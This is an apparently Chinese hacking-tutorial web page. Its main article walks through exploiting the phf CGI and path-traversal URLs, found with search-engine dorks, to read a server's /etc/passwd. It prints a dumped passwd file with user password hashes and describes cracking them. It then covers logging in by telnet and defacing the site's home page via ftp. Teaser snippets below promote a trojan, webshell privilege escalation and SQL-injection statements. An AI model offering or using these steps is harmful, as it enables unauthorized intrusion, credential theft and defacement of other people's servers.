怎么利用phf漏洞获取unix系统的最高权限?
给大家带来的是UNIX系统的phf漏洞的攻击方法配合密码强攻来获取系统的最高权限。首先,我们连上Internet,打开红客的网络扫描器:www.google.com (随着google公司对这个搜索引擎的性能的不断提高,到现在可以说扫描一些远程URL漏洞是轻而易举,甚至连信用卡用户的资料都能扫描得到。), Q9750406我们用Google来搜索下列代码:
/cgi-bin/phf?Qalias=xless /etc/passwd
/cgi-bin/phf.cgi?/etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
刷的一下,几百个具备这个条件的资料被搜索出来了,真正有这个漏洞的网站并不多,呵呵,我居然找到了几个能用的:
http://www.hehe.com/cgi-bin/php.cgi?/etc/passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
什么?不知道这个是什么?有没有搞错!这个就是UNIX系统的密码文档,这里面储存的都是用户账号和密码等资料。如:sk:UPrcTmnVSkd3w: 514:100:sk:/home/sk:/bin/bash 这一段代码就是一个账号为sk的用户的资料,UPrcTmnVSkd3w这个就是sk用户的密码,514是这个用户的用户标识,100是用户的组号,中间的sk表示的是用户的注释,/home/sk这个表示的是用户注册的目录,最后的/bin/bash是用户注册后系统执行的程序名。嘴唇都说干了,喝点 Coffee,呵呵!
我们在浏览器里打开了这个密码文件,然后我们把这个文件down下来,用小榕兄的乱刀来破解
。呵呵,设置好乱刀就开始run。没事情干了,呵呵,坐一边去聊天了,不多久,就看到一大排密码被破解出来了,呵呵,很有成就感。
现在我们用破解出来的账号进入系统:
telnet www.hehe.com
SUN OS 5.7
login: sk
passwd:xxxxxxx
#who(看看系统管理员在不在,安全起见)
sk(呵呵,只有我一个人在)
(这个用户居然是管理员级别的权限,呵呵,改掉他的主页!)
#ls
dev/ proc/ usr/ bin/ etc/ local/ root/
var/ boot/ home/ lost found/ sbin/
#cd home/www(通常web页面都是放在home/目录里的)
#ls
index.html main.html help.html ......
好,我们现在另开一个窗口,把做好的黑页用ftp传上来:
ftp www.hehe.com
ftp>put d:\index.html
切回到原来的窗口,找到我们上传的index.html文件:
#find . -name “index.html”
index.html(呵呵,就在根目录下)
#cp index.html \home\www\
呵呵,打开浏览器一看,修改成功!
电脑木马way2.4怎么用?火凤凰木马有哪些功能?
今次给大家推荐的是阿风哥的作品:无赖小子。(way) 说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗义的,没有开什么Email后门万能密码之类的,所
详情2018-02-24 19:51:58责编:llp 来源:驱动管家提升权限的个人总结 提升权限有哪些技巧?
当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1: C: Documents and Settings All Users Application Data Symantec pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它
详情2018-02-11 12:20:58责编:llp 来源:驱动管家处理webmail接口漏洞的邮件服务器surgemail
受影响系统: NetWin SurgeMail beta 39a NetWin SurgeMail
详情2018-01-03 09:06:24责编:llp 来源:驱动管家拿网站权限有哪些方法?拿挖掘鸡挖就是其中的一种
目标这个站 http: www chinaweibo cc upfile_Other asp这个漏洞我刚看了看成功率10%左右吧我觉得这个数字就不低了 毕竟是批量拿webshell~~~关于上传漏洞的帖子和教程论坛有好多相信大家都会了 我步骤省略点第
详情2018-02-09 09:40:39责编:llp 来源:驱动管家怎么获取ip地址?如何防范ip地址泄露?
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如
详情2018-01-13 18:10:20责编:llp 来源:驱动管家mysql命令的用法 怎么用mysql弱口令得到webshell?
很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传
详情2018-01-16 13:30:14责编:llp 来源:驱动管家微软浏览器接口有漏洞?ie7浏览器的漏洞说明
漏洞警告:通过对微软浏览器IE6跨域漏洞的深入研究,我们发现实际上即使在安装了IE7浏览器的操作系统中,也一样存在类似的问题。这个漏洞并不单独存在于IE6中,而是存在于微软提供的浏览器接口中。在微软提供的浏
详情2018-01-14 15:01:43责编:llp 来源:驱动管家一些php手工注入语句 手工注射时出现问题怎么办?
暴字段长度Order by num *匹配字段and 1=1 union select 1,2,3,4,5…… n *暴字段位置and 1=2 union select 1,2,3,4,5… n *利用内置函数暴数据库信息version() database() user()不用猜解可用字段
详情2018-02-28 16:58:15责编:llp 来源:驱动管家探索用php来实现数据的劫持和转发
前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发。我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。其实关于这个的原理,我记得很早
详情2018-02-16 14:47:48责编:llp 来源:驱动管家哪些网络口令容易被破解?黑客喜欢破解的网络口令
在企业网络管理中,有一项非常重要的任务,就是对口令安全的管理。可惜的是,很多企业在这个方面管理的并不是很好。下面笔者就谈谈在口令管理中,有哪些看起来很复杂的密码但是对于黑客来说,确是很容易破解。根
详情2018-02-16 19:27:29责编:llp 来源:驱动管家
- 怎么透过sniff进行入侵?要使用哪些入侵工具?
- Win7打印机安装失败是怎么回事?Win7系统安装打印机驱动的方法
- 电脑怎么安装驱动程序 电脑驱动的几种安装方法
- PDF图片怎么转换成word文档?PDF图片转换成word文档的方法
- 用xy苹果助手可以一键越狱吗?xy苹果助手一键越狱的方法
- 电脑 主板和cpu怎么搭配?主板和CPU最佳搭配原则
- i9-7980XE怎么样 Intel酷睿i9-7980XE评测
- 消息称GTX 2080将达到1499美元 远比iPhone X要高
- 坚决打击利用网络直播平台传播淫秽色情信息行为
- 华硕将开设“东京港区华硕商店”在日本正式开业
- 【游戏攻略】《绝地求生大逃杀》沙漠地图伏击点推荐 沙漠地图哪里好伏击?
- 【游戏攻略】《绝地求生大逃杀》头盔耐久减伤效果分析详解 头盔耐久怎么算?
- 【游戏资讯】《绝地求生》首次人数负增长 近30天流失玩家约10%
- Win7电脑开视频提示“视频捕捉不能正确作用”怎么办?
- mac外接的屏幕怎么设置为主屏?设置外接屏为主屏的方法
- XP换WIN7系统的相关问题
- 电脑正常开机后显示器黑屏怎么回事
- 电脑电源常见故障维修方法
- 为你介绍联想zuk edge的优缺点 联想zuk edge是不是该购买?
- 中国移动4g网络通畅吗?移动4g网速测试